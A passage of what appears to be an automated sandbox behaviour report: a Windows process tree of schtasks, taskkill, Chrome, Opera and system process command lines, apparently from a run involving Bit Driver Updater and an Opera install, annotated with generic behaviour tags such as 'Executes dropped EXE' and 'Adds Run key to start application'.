- Checks computer location settings
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /tn "Bit Driver Updater_launcher" /f
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im "bitdu.exe"
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4008 /prefetch:2
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3440 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7020 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3408 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7444 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,4283140038091543342,9558071313887975873,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1923648450\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1923648450\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={22ee6204-a9a5-4601-9686-455744785969} --system
- Executes dropped EXE
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x300 0x3f4
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{60A90A2F-858D-42AF-8929-82BE9D99E8A1}
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --start-maximized --ran-launcher --flag-switches-begin --flag-switches-end --enable-quic --lowered-browser
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_crashreporter.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.76 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x7ff91418c490,0x7ff91418c4a0,0x7ff91418c4b0
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --start-stack-profiler --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:2
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=2308 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --start-stack-profiler --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=1980 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=3156 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=3168 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=3180 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=3192 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=3204 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=3216 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --start-stack-profiler --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=3424 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --mojo-platform-channel-handle=3440 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --mojo-platform-channel-handle=4532 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --start-stack-profiler --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --mojo-platform-channel-handle=4540 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on 